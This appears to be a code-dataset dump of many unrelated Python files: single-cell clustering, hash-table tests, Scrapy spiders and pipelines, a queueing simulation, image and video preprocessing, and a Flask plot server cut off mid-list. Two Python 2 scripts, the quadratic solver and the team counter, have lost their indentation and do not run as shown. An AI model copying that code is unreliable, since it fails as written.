text stringlengths 8 6.05M |
|---|
#!/usr/bin/env python3
"""Cluster cells of a 10x Genomics filtered feature-barcode matrix with
KMeans and print the 50 highest-count genes for every cluster."""
import csv
import gzip
import os

import pandas as pd
import scipy.io
from sklearn.cluster import KMeans

matrix_dir = "H:\\SingleCell\\smc009\\filtered_feature_bc_matrix\\"

# Sparse gene-by-cell count matrix (MatrixMarket format, gzip-compressed).
mat = scipy.io.mmread(os.path.join(matrix_dir, "matrix.mtx.gz"))


def _read_tsv_gz(path):
    """Return all rows of a gzip-compressed TSV file as a list of lists.

    BUG FIX: mode='rt' must be passed to gzip.open, not csv.reader
    (csv.reader has no 'mode' keyword).
    """
    with gzip.open(path, mode='rt') as handle:
        return list(csv.reader(handle, delimiter="\t"))


# Read the features table once instead of once per extracted column.
features = _read_tsv_gz(os.path.join(matrix_dir, "features.tsv.gz"))
feature_ids = [row[0] for row in features]
gene_names = [row[1] for row in features]
feature_types = [row[2] for row in features]

barcodes = [row[0] for row in _read_tsv_gz(os.path.join(matrix_dir, "barcodes.tsv.gz"))]

# Genes on the index, cell barcodes on the columns.
mat1 = pd.DataFrame.sparse.from_spmatrix(mat)
mat1.columns = barcodes
mat1.index = gene_names

# Cells as rows for clustering. The original looked up / dropped a
# 'cluster_id' row here, which cannot exist yet and raised KeyError;
# the freshly transposed matrix is used directly instead.
mat1_transpose = mat1.transpose()
mat1_t_del = mat1_transpose

kmeans1 = KMeans(n_clusters=30, random_state=0).fit(mat1_t_del)
mat1_t_del['cluster_id'] = kmeans1.labels_

# Per-cluster gene totals, kept in a dict instead of vars() injection
# (the original created cl0sum..cl28sum dynamically, with the names
# off by one from the actual cluster ids, and skipped one cluster).
gene_columns = mat1_t_del.columns != 'cluster_id'
cluster_sums = {}
for cluster in sorted(mat1_t_del['cluster_id'].unique()):
    cluster_sums[cluster] = (
        mat1_t_del[mat1_t_del['cluster_id'] == cluster].loc[:, gene_columns].sum(axis=0)
    )

# Top 50 genes by total count for every cluster (replaces the 29
# copy-pasted sort/head lines).
for cluster, sums in cluster_sums.items():
    print("cluster %s" % cluster)
    print(sums.sort_values(ascending=False).head(50))

mat1.to_csv("H:\\SingleCell\\smc009\\smc009matrix_featurebarcode.csv")
|
#Test Universal Hash Table
import unittest, pdb
from universalhash import UniversalHash
class Test_Hash(unittest.TestCase):
    """Unit tests for the UniversalHash table implementation."""

    def setUp(self):
        # A fresh 100-slot table for every test.
        self.test_table = UniversalHash(100)

    def test_get_prime(self):
        """_get_prime returns the smallest prime above its argument."""
        self.assertEqual(self.test_table._get_prime(42), 43)
        self.assertEqual(self.test_table._get_prime(502), 503)

    def test_hashfunc(self):
        """hash_func follows the universal formula ((a*k + b) % p) % size."""
        table = self.test_table
        table.p = 119
        table.a = .6667
        table.b = 11
        key = 21
        expected = ((round(table.a * key + table.b)) % table.p) % table.size
        self.assertEqual(expected, table.hash_func(key))

    def test_getitem(self):
        """Missing keys raise KeyError; stored values round-trip."""
        self.test_table = UniversalHash(1000)
        with self.assertRaises(KeyError):
            self.test_table[19]
        self.test_table[26] = "James"
        self.assertEqual(self.test_table[26], "James")

    def test_deleteitem(self):
        """Deleting a key leaves a 'DEL' tombstone in its slot."""
        self.test_table = UniversalHash(10)
        self.test_table[300] = "Laura"
        self.test_table[2201] = "Ted"
        self.test_table[26] = "Jillian"
        self.test_table.delete_item(26)
        slot = self.test_table.hash_func(26) % 10
        self.assertEqual(self.test_table.hashtable[slot][0], "DEL")

    def test_len(self):
        """length tracks the number of stored items."""
        self.test_table = UniversalHash(10)
        for key, value in ((300, "Laura"), (2201, "Ted"), (26, "Jillian")):
            self.test_table[key] = value
        self.assertEqual(self.test_table.length, 3)

    def test_keys_vals(self):
        """keys and values expose everything that was inserted."""
        self.test_table = UniversalHash(10)
        for key, value in ((300, "Laura"), (2201, "Ted"), (26, "Jillian")):
            self.test_table[key] = value
        for key in (300, 2201, 26):
            self.assertIn(key, self.test_table.keys)
        for value in ("Laura", "Ted", "Jillian"):
            self.assertIn(value, self.test_table.values)

if __name__ =='__main__':
    unittest.main()
|
#Finding the nature of the roots and the roots of a quadratic equation
import math
a=input ("Enter the coefficient of x2:")
b=input ("Enter the coefficient of x:")
c=input ("Enter the coefficient of constant:")
D = b**2 - 4*a*c
if D > 0:
print "Real and unequal roots"
if D>0:
x = (-1*b + D**0.5) / (2*a)
y = (-1*b - D**0.5) / (2*a)
elif D == 0:
x = (-1*b + D**0.5) / (2*a)
y = (-1*b - D**0.5) / (2*a)
print "The roots of the quadratic equation are:",x,y
elif D == 0:
print "Real and equal roots"
if D>0:
x = (-1*b + D**0.5) / (2*a)
y = (-1*b - D**0.5) / (2*a)
elif D == 0:
x = (-1*b + D**0.5) / (2*a)
y = (-1*b - D**0.5) / (2*a)
print "The roots of the quadratic equation are:",x,y
else:
print "Real roots do not exist"
|
#!/usr/bin/python3
"""Re-run the most recently edited script recorded in vim's MRU list."""
import os
import sys

printFiles = False
query = -1
if len(sys.argv) == 1:
    printFiles = True
else:
    query = int(sys.argv[1])

mru_path = os.path.expanduser("~/.vim_mru_files")
if not os.path.exists(mru_path):
    # Fall back to the Windows-side home when running under WSL.
    mru_path = "/mnt/c/Users/Peter/.vim_mru_files"

with open(mru_path) as f:
    read = f.readlines()

# NOTE(review): index 1 skips the first line of the MRU file -- presumably
# a header line; confirm against the actual file format.
# BUG FIX: strip the trailing newline so the extension test and the path
# handed to os.system are clean.
lastfile = read[1].strip().split(".")[-1]
print("lastfile : {}".format(lastfile))
if "py" in lastfile:
    print("read[1]")
    os.system("python3 {}".format(os.path.expanduser(read[1].strip())))
else:
    print("read[]")
    print(read[1])
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
import MySQLdb
from scrapy.exceptions import NotConfigured
class RadiosyncPipeline(object):
    """Writes scraped radio-station items to a MySQL table."""

    def __init__(self, db, user, passwd, host):
        # Connection parameters only; the connection itself is opened lazily
        # in open_spider so the pipeline can be constructed without a DB.
        self.db = db
        self.user = user
        self.passwd = passwd
        self.host = host

    @classmethod
    def from_crawler(cls, crawler):
        """Build the pipeline from the crawler's DB_SETTINGS dict.

        Raises NotConfigured when DB_SETTINGS is absent, which tells Scrapy
        to disable this pipeline.
        """
        db_settings = crawler.settings.getdict("DB_SETTINGS")
        if not db_settings:
            raise NotConfigured
        db = db_settings['db']
        user = db_settings['user']
        passwd = db_settings['passwd']
        host = db_settings['host']
        return cls(db, user, passwd, host)

    def open_spider(self, spider):
        """Open the MySQL connection once per spider run."""
        self.conn = MySQLdb.connect(db=self.db,
                                    user=self.user, passwd=self.passwd,
                                    host=self.host,
                                    charset='utf8', use_unicode=True)
        self.cursor = self.conn.cursor()

    def process_item(self, item, spider):
        """Insert one station row (parameterized query, committed per item)."""
        sql = "INSERT INTO r01radio_copy (directory,radio_name,address,country,genres,language,phone,email,website,logo,stream_link) VALUES (%s, %s, %s,%s, %s, %s,%s, %s, %s,%s, %s)"
        self.cursor.execute(sql,
            (
                item.get("directory"),
                item.get("radio_name"),
                item.get("address"),
                item.get("country"),
                item.get("genres"),
                item.get("language"),
                item.get("phone"),
                item.get("email"),
                item.get("website"),
                # NOTE(review): assumes at least one downloaded image; raises
                # IndexError/TypeError when 'images' is empty or missing.
                item.get("images")[0]['path'],
                item.get("stream_link")
            )
        )
        self.conn.commit()
        return item

    def close_spider(self, spider):
        """Close the connection when the spider finishes."""
        self.conn.close()
class ImageJsonPipeline(object):
    """Flattens the 'images' field to the first downloaded image's path."""

    def process_item(self, item, spider):
        images = item['images']
        if images:
            item['images'] = images[0]['path']
        return item
import scrapy
from scrapy.http import Request
class CombineSpider(scrapy.Spider):
    """Scrapes NFL combine measurements for every player, 1987-2020."""
    handle_httpstatus_list = [404]
    name = 'combine'
    allowed_domains = ['nflcombineresults.com']
    # BUG FIX: the original indexed a 34-year list with range(33), silently
    # dropping the 2020 combine; iterate the years directly instead.
    start_urls = ['https://nflcombineresults.com/nflcombinedata.php?year={}&pos=&college='
                  .format(year) for year in range(1987, 2021)]

    def parse(self, response):
        """Follow every player-page link found on a year's results table."""
        hrefs = response.xpath('//*[contains(@href,"playerpage")]/@href').re('(?<=https://nflcombineresults.com/).+')
        for player in hrefs:
            yield Request('https://nflcombineresults.com/' + player, callback=self.parse_player)

    def parse_player(self, response):
        """Extract one player's measurements from their profile page."""
        def cell(label):
            # Second column of the table row whose text contains *label*.
            return response.xpath('//tr[contains(.,"%s")]/td[2]/text()' % label)

        first_name = cell("First Name").re(r'\w+')
        last_name = cell("Last Name").re(r'\w+')
        draft_year = cell("Draft Class")[0].re(r'\d+')
        college = cell("College").re(r'\w+')
        position = cell("Position")[0].re(r'\w+')
        height = cell("Height")[0].re(r'\d+')
        weight = cell("Weight")[0].re(r'\d+')
        # BUG FIX: '.' was unescaped in all the decimal patterns below;
        # r'\d+\.\d+' matches only a literal decimal point.
        bmi = cell("BMI")[0].re(r'\d+\.\d+')
        arm_length = cell("Arm Length")[0].re(r'\d+\.\d+')
        hand_size = cell("Hand Size")[0].re(r'\d+\.\d+')
        wing_span = cell("Wingspan")[0].re(r'\d+\.\d+')
        forty_yard_dash = cell("40 Yard Dash")[0].re(r'\d+\.\d+')
        forty_yard_mph = cell("40 Yard (MPH)")[0].re(r'\d+\.\d+')
        twenty_yard_split = cell("20 Yard Split")[0].re(r'\d+\.\d+')
        bench = cell("Bench Press")[0].extract()
        qb_ball_velocity = cell("QB Ball Velocity")[0].extract()
        vertical_leap = cell("Vertical Leap")[0].re(r'\d+\.\d+')
        broad_jump = cell("Broad Jump")[0].re(r'\d+\.\d+')
        twenty_yrd_shuttle = cell("20 Yd Shuttle")[0].re(r'\d+\.\d+')
        three_cone = cell("Three Cone")[0].re(r'\d+\.\d+')
        yield {'First Name': first_name,
               'Last Name': last_name,
               'Draft Year': draft_year,
               'College': college,
               'Position': position,
               'Height (inch)': height,
               'Weight (lbs)': weight,
               'BMI': bmi,
               'ArmLength (inch)': arm_length,
               'Hand Size (inch)': hand_size,
               'Wing Span (inch)': wing_span,
               '40 Yard Dash (s)': forty_yard_dash,
               '40 Yard (MPH)': forty_yard_mph,
               '20 Yard Split (s)': twenty_yard_split,
               'Bench Press': bench,
               'QB Ball Velocity': qb_ball_velocity,
               'Vertical Leap (inch)': vertical_leap,
               'Broad Jump (inch)': broad_jump,
               '20 Yd Shuttle (s)': twenty_yrd_shuttle,
               'Three Cone': three_cone
               }
|
# Using a Markov chain to analyse a queueing system.
# Arrivals that find the buffer full are dropped.
import numpy as np
import math
import matplotlib.pyplot as plt

# Parameters
b = 2  # buffer size
l_input = np.arange(0.1, 2.0, 0.05)  # sweep of input rates (lambda)
T = 1  # service time of the system
num_windows = 100000  # number of time windows to simulate
V = np.array([0 for i in range(num_windows)], dtype=int)  # arrivals per window
N = np.array([0 for j in range(num_windows)], dtype=int)  # requests present per window
# Построение графиков (Если что, то нужно будет доделать (Распеделение по X)
# Plot experimental vs. theoretical curves against the input rate.
def create_graphics(exp, teor, y_des="Ось Y"):
    """Plot *exp* (blue) and *teor* (red) against l_input and show the figure."""
    plt.figure()
    plt.plot(l_input, exp, color="blue", label="Эксперимент")
    plt.plot(l_input, teor, color="red", label="Теория")
    plt.xlabel("Лямбда входное")
    plt.ylabel(y_des)
    plt.grid(True)
    plt.xkcd(True)
    plt.legend()
    plt.show()
# Пуассоновский входной поток (показывает вероятность поступления i-ого кол-ва заявок в систему при интенсивности входного потока lamb)
def poisson_input_stream(i, lamb):
    """Poisson pmf: probability that exactly *i* requests arrive in one
    window when the input rate is *lamb*."""
    weight = lamb ** i / math.factorial(i)
    return weight * math.exp(-lamb)
# Математическое ожидание от числа заявок (абонентов, т.к. у каждого абона может быть только 1 заявка)
def mat_og(p):
    """Expected number of requests: sum of i * p[i] over the stationary
    distribution *p* (each subscriber holds at most one request)."""
    return sum(state * p[state] for state in range(b + 1))
# Средняя задержка по теореме Литла
def little(n, lamb_out):
#if lamb_out == 0:
# lamb_out = 0.00000001
return n / lamb_out
# Создание матрицы переходов по МЦ (Вероятность переходов сильно зависит от входного потока) (Работает на ура!)
def create_transition_matrix(lamb):
# lamb - интенсивность входного потока
tm = np.array([[0.0 for i in range(b + 1)] for i in range(b + 1)], dtype=float)
check_sum = np.array([0.0 for i in range(b + 1)], dtype=float)
check_sum2 = np.array([0.0 for i in range(b + 1)], dtype=float)
num_not_null_elements = np.array([0 for i in range(b + 1)], dtype=int) # Кол-во ненулевых элементов в строке
for i in range(len(tm)):
v = 0 # Кол-во сообщений, пришедших в конкретное окно
for j in range(len(tm[i])):
if i < (j + 2):
tm[i][j] = poisson_input_stream(v, lamb) # Вероятность перехода МЦ из состояния i в состояние j
v += 1
num_not_null_elements[i] += 1
check_sum[i] += tm[i][j]
# print(check_sum)
# Значение, которое не было добрано до суммы делим поровну между всеми вероятностями.
for i in range(len(tm)):
for j in range(len(tm[i])):
if i < (j + 2):
tm[i][j] = tm[i][j] + ((1.0 - check_sum[i]) / num_not_null_elements[i])
if i == len(tm) - 1 & j == len(tm[i]) - 1:
tm[i][j] = 0.0
tm[i][j - 1] = 1.0
check_sum2[i] += tm[i][j]
# print(check_sum2)
return tm
# Стационарное распределение для теоретического расчёта
def fsd(tm):
sd = np.linalg.matrix_power(tm, num_windows)
return sd[0]
# Приход заявок
def input_messege(lamb):
windows = np.array([poisson_input_stream(i, lamb) for i in range(20)])
w = np.array([0.0 for i in range(len(windows))])
s = 0
for i in range(len(windows)):
s += windows[i]
w[i] = s
r = np.random.random()
for i in range(len(w)):
if r < w[i]:
return i
def theor_l_out(sd):
    """Theoretical output rate: total stationary probability of states
    1 .. len(sd)-2 (the first and last states are excluded, as in the
    original formulation)."""
    total = 0
    for probability in sd[1:len(sd) - 1]:
        total += probability
    return total
# Подсчёт задержки
def count_delay(v, n):
# v - кол-во поступивших сообщений
# n - кол-во сообщений в буфере
return min(max((n + v) - 1, 0), b)
def experiment():
    """Monte-Carlo simulation of the queue over num_windows slots.

    Returns
    -------
    E_N : mean number of requests in the system, per input rate
    E_D : mean request delay (filled only for rates < 1.0)
    l_out : output-stream intensity, per input rate
    """
    print("Эксперимент")
    E_N = np.array([0.0 for i in range(len(l_input))], dtype=float)  # mean number of requests (subscribers) in the system
    E_D = np.array([0.0 for i in range(len(l_input) // 2 - 1)], dtype=float)  # mean delay of a request in the system
    l_out = np.array([0.0 for i in range(len(l_input))], dtype=float)  # output-stream intensity
    for lamb in range(len(l_input)):
        e_N = 0  # running total of requests present per window
        num_out_message = 0
        e_D = 0
        for i in range(num_windows - 1):
            V[i] = input_messege(l_input[lamb])
            # One request served per window; arrivals beyond buffer b are dropped.
            N[i + 1] = min(max(N[i] - 1, 0) + V[i], b)
            e_N += N[i]
            e_D += count_delay(V[i], N[i])
            if max(N[i], 0) != 0:
                num_out_message += 1
        E_N[lamb] = e_N / num_windows
        l_out[lamb] = num_out_message / num_windows
        # Delay only recorded in the stable region (rate < 1.0);
        # NOTE(review): the +0.5 is presumably a half-window residual-time
        # correction -- confirm against the model derivation.
        if l_input[lamb] < 1.0:
            #E_D[lamb] = e_D / num_out_message + 0.5
            E_D[lamb] = little(E_N[lamb], l_out[lamb]) + 0.5
    return E_N, E_D, l_out
def theory():
    """Analytic counterpart of experiment(): Markov-chain stationary analysis.

    Returns the same (E_N, E_D, l_out) triple, computed from the stationary
    distribution of the transition matrix instead of simulation.
    """
    print("Теория")
    E_N = np.array([0.0 for i in range(len(l_input))], dtype=float)  # mean number of requests (subscribers) in the system
    E_D = np.array([0.0 for i in range(len(l_input) // 2 - 1)], dtype=float)  # mean delay of a request in the system
    l_out = np.array([0.0 for i in range(len(l_input))], dtype=float)  # output-stream intensity
    for lamb in range(len(l_input)):
        tm = create_transition_matrix(l_input[lamb])  # transition matrix
        sd = fsd(tm)  # stationary distribution of the system
        E_N[lamb] = mat_og(sd)  # expected number of requests
        l_out[lamb] = theor_l_out(sd)
        #E_D[lamb] = little(E_N[lamb], l_out[lamb])
        # Closed-form delay for the stable region (rate < 1.0);
        # NOTE(review): source of this formula is not shown here -- confirm.
        if l_input[lamb] < 1.0:
            E_D[lamb] = (3 - 2 * l_input[lamb]) / (2 * (1 - l_input[lamb]))
    return E_N, E_D, l_out
def create_graphics_out(exp, y_des="Ось Y"):
    """Plot a single experimental curve against l_input (no theory curve)."""
    plt.figure()
    plt.plot(l_input, exp, color="blue", label="Эксперимент")
    #plt.plot(l_input, teor, color="red", label="Теория")
    plt.xlabel("Лямбда входное")
    plt.ylabel(y_des)
    plt.grid(True)
    plt.xkcd(True)
    plt.legend()
    plt.show()
def create_graphics_D(exp, teor, y_des="Ось Y"):
    """Plot delay curves; the x-axis is restricted to the stable-rate
    prefix of l_input (matching the shorter E_D arrays)."""
    plt.figure()
    l = np.array([l_input[i] for i in range(len(l_input) // 2 - 1)], dtype=float)  # stable-region lambda values
    plt.plot(l, exp, color="blue", label="Эксперимент")
    plt.plot(l, teor, color="red", label="Теория")
    plt.xlabel("Лямбда входное")
    plt.ylabel(y_des)
    plt.grid(True)
    plt.xkcd(True)
    plt.legend()
    plt.show()
# Run the simulation and the analytic model, then compare them graphically.
exp_E_N, exp_E_D, exp_l_out = experiment()
teor_E_N, teor_E_D, teor_l_out = theory()
create_graphics_out(exp_l_out, y_des="Интенсивность выходного потока")
create_graphics(exp_E_N, teor_E_N, y_des="Среднее кол-во абонентов в системе")
create_graphics_D(exp_E_D, teor_E_D, y_des="Среднее время нахождения заявки в системе")
print(exp_l_out)
|
# Read three integers and report whether they are strictly monotonic
# (either increasing or decreasing).
A = int(input("A= "))
B = int(input("B= "))
C = int(input("C= "))
is_monotonic = A < B < C or A > B > C
print(is_monotonic)
# Filename: MetaData.py
# Author: Brian Lach (July 10, 2020)
# Purpose: Provides info about entity metadata types and how to serialize/unserialize them.
from panda3d.core import LVecBase3f, LVecBase2f, LVecBase4f, CKeyValues
from bsp.leveleditor.fgdtools import FgdEntityProperty
from bsp.leveleditor import LEUtils
# Property names managed by the editor itself and therefore never treated
# as generic, serializable metadata.
MetaDataExclusions = [
    'id',
    'classname',
    'visgroup'
]
# Maps an FGD value-type name to
# (native type, unserialize func, serialize func, default value).
MetaDataType = {
    'string': (str, str, str, ""),
    'decal': (str, str, str, ""),
    'sound': (str, str, str, ""),
    'float': (float, float, str, 0.0),
    'color255': (LVecBase4f, CKeyValues.to4f, CKeyValues.toString, LVecBase4f(255, 255, 255, 255)),
    'vec3': (LVecBase3f, CKeyValues.to3f, CKeyValues.toString, LVecBase3f(0, 0, 0)),
    'vec4': (LVecBase4f, CKeyValues.to4f, CKeyValues.toString, LVecBase4f(0, 0, 0, 0)),
    'vec2': (LVecBase2f, CKeyValues.to2f, CKeyValues.toString, LVecBase2f(0, 0)),
    'integer': (int, int, str, 0),
    'choices': (int, int, str, 0),
    'flags': (int, int, str, 0),
    'studio': (str, str, str, ""),
    'target_source': (str, str, str, ""),
    'target_destination': (str, str, str, ""),
    'target_destinations': (str, str, str, ""),
    'boolean': (bool, LEUtils.strToBool, LEUtils.boolToStr, False)
}
def getMetaDataType(valueType):
    """Return the (type, unserialize, serialize, default) tuple for *valueType*."""
    entry = MetaDataType[valueType]
    return entry
def getNativeType(typeName):
    """Return the native type used to store values of *typeName*."""
    native, _, _, _ = MetaDataType[typeName]
    return native
def getUnserializeFunc(typeName):
    """Return the callable that parses a serialized string into a *typeName* value."""
    _, unserialize, _, _ = MetaDataType[typeName]
    return unserialize
def getSerializeFunc(typeName):
    """Return the callable that converts a *typeName* value to a string."""
    _, _, serialize, _ = MetaDataType[typeName]
    return serialize
def getDefaultValue(typeName):
    """Return the default value assigned to properties of *typeName*."""
    _, _, _, default = MetaDataType[typeName]
    return default
def isPropertyExcluded(propName):
    """True when *propName* is editor-managed and skipped during serialization."""
    return any(excluded == propName for excluded in MetaDataExclusions)
|
# Socket protocol message constants (names suggest a client/server setup for
# a remotely driven vehicle -- identification, joystick control, recognition).

# Client-identification messages.
SOCKET_ID_RECOGNITION = 'id_recognition'
SOCKET_ID_JOYSTICK = 'id_joystick'
SOCKET_ID_VEHICLE = 'id_vehicle'
SOCKET_ID_FAKE = 'id_fake'
SOCKET_ID_APPROVED = 'id_approved'

# Control / framing messages.
SOCKET_ERR_UNKNOWN_CMD = 'unknown_cmd'
SOCKET_DISCONNECT = 'disconnect'
SOCKET_BROADCAST_ALL = 'broadcast_all'
SOCKET_EOL = '<|>'  # message delimiter; presumably end-of-message marker

# Joystick drive / steering commands.
SOCKET_JOY_FORWARD = 'joy_forward'
SOCKET_JOY_BACKWARD = 'joy_backward'
SOCKET_JOY_NEUTRAL = 'joy_neutral'
SOCKET_JOY_DIR_LEFT = 'joy_dir_left'
SOCKET_JOY_DIR_RIGHT = 'joy_dir_right'
SOCKET_JOY_DIR_NEUTRAL = 'joy_dir_neutral'

# Recognition-state events.
SOCKET_RECOGNITION_DETECTED = 'recognition_detected'
SOCKET_RECOGNITION_FREE = 'recognition_free'
|
import getopt, sys
import urllib2
def pull_prediction(duration):
    """Return the predicted spot price for a job lasting *duration* hours.

    Scrapes the DrAFTS prediction page, which embeds two JS arrays:
    x (durations) and y (prices); returns the first price whose duration
    meets or exceeds *duration*.
    """
    # NOTE(review): the original comment said us-west-2, but the URL is the
    # us-east-1 m3.medium page -- confirm which region is intended.
    url = 'http://128.111.84.183/us-east-1-m3.medium.html'
    f = urllib2.urlopen(url)
    for line in f:
        if line.startswith('x: ['):
            x = [float(i) for i in line[4:-3].split(', ')]
        elif line.startswith('y: ['):
            y = [float(j) for j in line[4:-3].split(', ')]
    i = 0
    # NOTE(review): raises IndexError when duration exceeds every x value,
    # and NameError if the page no longer embeds the arrays.
    while (float(x[i]) < float(duration)):
        i += 1
    return y[i]
#def initial_setup(x, k=1):
# Setup master node (balancer)
def usage():
    """Print the command-line usage string (Python 2 script)."""
    s = """
Usage: ./predict_price.py -d [time duration (in hours)] -b [budget limit (in dollars)]
"""
    print s
def main():
    """Parse -d/--duration and -b/--budget, then print the price prediction."""
    try:
        opts, args = getopt.getopt(sys.argv[1:], 'hd:b:', ["help", "duration=", "budget="])
    except getopt.GetoptError as err:
        print str(err)
        usage()
        sys.exit(2)
    for o, a in opts:
        if o in ['-h', '--help']:
            usage()
            sys.exit()
        elif o in ['-d', '--duration']:
            duration = a
        elif o in ['-b', '--budget']:
            budget = a
        else:
            assert False, "unhandled option"
    # NOTE(review): 'budget' is collected but never used, and 'duration' is
    # undefined (NameError below) when -d is not supplied.
    pred = pull_prediction(duration)
    print str(pred)
#if __name__ == '__main__':
# main()
|
inputList =[]
listElementCount=[]
flag="false"
allowedvalues=['m','z','c','p','s']
inp1=raw_input("enter input:")
inputString=str(inp1)
for i in inputString:
inputList +=i
for i in inputString:
if i in allowedvalues:
flag="true"
else:
flag="false"
print("The input provided is not acceptable, please re-run with proper input")
break
if flag == "true" :
for i in inputList:
count=inputList.count(i)
b=inputList.index(i)
listElementCount.append(count)
print i, count
minCount=min(listElementCount)
print("No of Unique Teams formed")
print(minCount)
|
import os
import numpy as np
from PIL import Image
def load_data():
    """Load the covered-document images and their margin labels.

    Returns
    -------
    x_train : np.ndarray
        Images resized to 224x224 (VGG16 input size), scaled to [0, 1].
    y_train : np.ndarray
        Per-image box as (x_center, y_center, w, h) in the 224x224 frame,
        divided by 224 (YOLO-v1 style).
    """
    # Labels: four margins per image, clockwise order left-top-right-bottom.
    y_train = []
    with open(os.path.join('data', 'margin.txt')) as file:
        lines = file.readlines()
        for line in lines:
            line = line.strip('\n').strip('[').strip(']')  # drop surrounding [] and the newline
            line = line.split(',')  # str to list
            line = list(map(int, line))
            y_train.append(line)
    y_train = np.array(y_train)
    # Open every image, resize to 224x224 (VGG16 input size) and rescale the
    # margin values by the same width/height ratios.
    data_folder_path = os.path.join('data', 'data_covered')  # dataset path
    files = os.listdir(data_folder_path)  # all image files
    # NOTE(review): assumes sorted filenames line up with the line order of
    # margin.txt -- confirm the naming convention guarantees this.
    files.sort()
    x_train = []
    i = 0
    for file in files:
        path = os.path.join(data_folder_path, file)
        image = Image.open(path)
        width, height = image.size[0], image.size[1]
        width_ratio = 224 / width
        height_ratio = 224 / height
        # NOTE(review): y_train has an integer dtype, so these scaled values
        # are truncated on assignment.
        y_train[i][0] = y_train[i][0] * width_ratio
        y_train[i][2] = y_train[i][2] * width_ratio
        y_train[i][1] = y_train[i][1] * height_ratio
        y_train[i][3] = y_train[i][3] * height_ratio
        # Resize the image itself.
        image = image.resize((224, 224), Image.ANTIALIAS)
        pixel = np.asanyarray(image)
        # pixel = np.asarray(image)
        x_train.append(pixel)
        i = i + 1
    x_train = np.array(x_train)
    # (An earlier commented-out variant of the resize loop was removed here.)
    # YOLO-v1-style target: convert the four margins to x, y, w, h.
    for i in range(y_train.shape[0]):
        [m0, m1, m2, m3] = y_train[i]
        y_train[i] = [(224 - m2 + m0) / 2, (224 - m3 + m1) / 2, 224 - m2 - m0, 224 - m3 - m1]
    # Normalize.
    x_train = x_train / 255.0
    y_train = y_train / 224.0
    return x_train, y_train
|
import warnings

import numpy as np
import numpy as numpy
from scipy import ndimage
from skimage import morphology
def remove_small_objects(mask, small_objects=0, small_holes=0):
    """
    Removes small objects (white areas of mask) and small holes (black areas).

    Parameters
    ----------
    mask : 2D array of bool
        Mask showing the area of one phase.
    small_objects : int
        Max area of connected white pixels that will be removed.
    small_holes : int
        Max area of connected black pixels that will be removed.

    Returns
    -------
    out_mask : 2D array of bool
        Mask with small holes and objects removed.
    """
    with warnings.catch_warnings():
        warnings.simplefilter("ignore")
        # Drop small white blobs, then drop small black blobs by removing
        # small "objects" of the inverted mask and inverting back.
        cleaned = morphology.remove_small_objects(mask, small_objects)
        inverted_clean = morphology.remove_small_objects(~cleaned, small_holes)
    return ~inverted_clean
def smooth_edges(mask, smooth_radius=1):
    """
    Smoothes the edges of a binary mask.

    Parameters
    ----------
    mask : 2D array of bool
        Mask showing the area of one phase.
    smooth_radius : float64
        The radius of the smoothing operation. See note below.

    Returns
    -------
    smooth_mask : 2D array of bool
        Mask that has been smoothed.

    Notes
    -----
    smooth_radius sets the structure element (selem) for smoothing the edges
    of the masks. If smooth_radius rounds up, the selem is a disk with the
    rounded-up radius. If smooth_radius rounds down, selem is a box of side
    1 + 2*floor(radius).
    """
    smooth_radius = max(smooth_radius, 1)
    if round(smooth_radius, 0) > int(smooth_radius):  # rounds up -> disk
        selem = morphology.disk(round(smooth_radius, 0))
    else:  # rounds down -> square
        size = 1 + 2 * int(smooth_radius)
        # BUG FIX: the file imports numpy as 'numpy', not 'np'; the original
        # 'np.ones' raised NameError whenever this branch ran.
        selem = numpy.ones((size, size))
    # Opening removes protrusions; closing fills indentations.
    smooth_mask = ndimage.binary_opening(mask, structure=selem)
    smooth_mask = ndimage.binary_closing(smooth_mask, structure=selem)
    return smooth_mask
|
import torch
from torchvision.transforms import transforms
from transforms import ConvertBCHWtoCBHW
class VideoClassificationPresetTrain:
    """Training-time transform pipeline for video clips."""

    def __init__(
        self,
        *,
        crop_size,
        resize_size,
        mean=(0.43216, 0.394666, 0.37645),
        std=(0.22803, 0.22145, 0.216989),
        hflip_prob=0.5,
    ):
        # We hard-code antialias=False to preserve results after its default
        # changed from None to True (see
        # https://github.com/pytorch/vision/pull/7160).
        # TODO: we could re-train the video models with antialias=True?
        steps = [
            transforms.ConvertImageDtype(torch.float32),
            transforms.Resize(resize_size, antialias=False),
        ]
        if hflip_prob > 0:
            steps.append(transforms.RandomHorizontalFlip(hflip_prob))
        steps.append(transforms.Normalize(mean=mean, std=std))
        steps.append(transforms.RandomCrop(crop_size))
        steps.append(ConvertBCHWtoCBHW())
        self.transforms = transforms.Compose(steps)

    def __call__(self, x):
        return self.transforms(x)
class VideoClassificationPresetEval:
    """Evaluation-time transform pipeline for video clips."""

    def __init__(self, *, crop_size, resize_size, mean=(0.43216, 0.394666, 0.37645), std=(0.22803, 0.22145, 0.216989)):
        # We hard-code antialias=False to preserve results after its default
        # changed from None to True (see
        # https://github.com/pytorch/vision/pull/7160).
        # TODO: we could re-train the video models with antialias=True?
        steps = [
            transforms.ConvertImageDtype(torch.float32),
            transforms.Resize(resize_size, antialias=False),
            transforms.Normalize(mean=mean, std=std),
            transforms.CenterCrop(crop_size),
            ConvertBCHWtoCBHW(),
        ]
        self.transforms = transforms.Compose(steps)

    def __call__(self, x):
        return self.transforms(x)
|
"""Flask app serving report pages and their matching matplotlib PNG plots.

Every enabled report consists of a template route (/<name>.html) and a plot
route (/<name>.png) backed by a queries.get_queryN() function; they are
registered in a loop instead of ten hand-written copy-pasted view pairs.
"""
from flask import Flask, render_template, send_file
import queries

app = Flask(__name__)


@app.route('/')
def home():
    return render_template('home.html')


@app.route('/hello.html')
def hello_world():
    return render_template('hello.html')


def _register_graph(page_name, query_func):
    """Register /<page>.html and /<page>.png under the same endpoint names
    the original hand-written views used ('<page>' and '<page>_plot'), so
    url_for() and the templates keep working unchanged."""
    def page_view():
        return render_template('{}.html'.format(page_name))

    def plot_view():
        graph = query_func()
        return send_file(graph, mimetype='image/png', cache_timeout=0)

    app.add_url_rule('/{}.html'.format(page_name), endpoint=page_name,
                     view_func=page_view)
    app.add_url_rule('/{}.png'.format(page_name), endpoint=page_name + '_plot',
                     view_func=plot_view)


# One (page, query) pair per enabled report. The second, fourth, tenth,
# eleventh, fifteenth and sixteenth reports were commented out in the
# original and remain disabled here.
for _page, _query in [
    ('first', queries.get_query1),
    ('third', queries.get_query3),
    ('sixth', queries.get_query6),
    ('seventh', queries.get_query7),
    ('eighth', queries.get_query8),
    ('ninth', queries.get_query9),
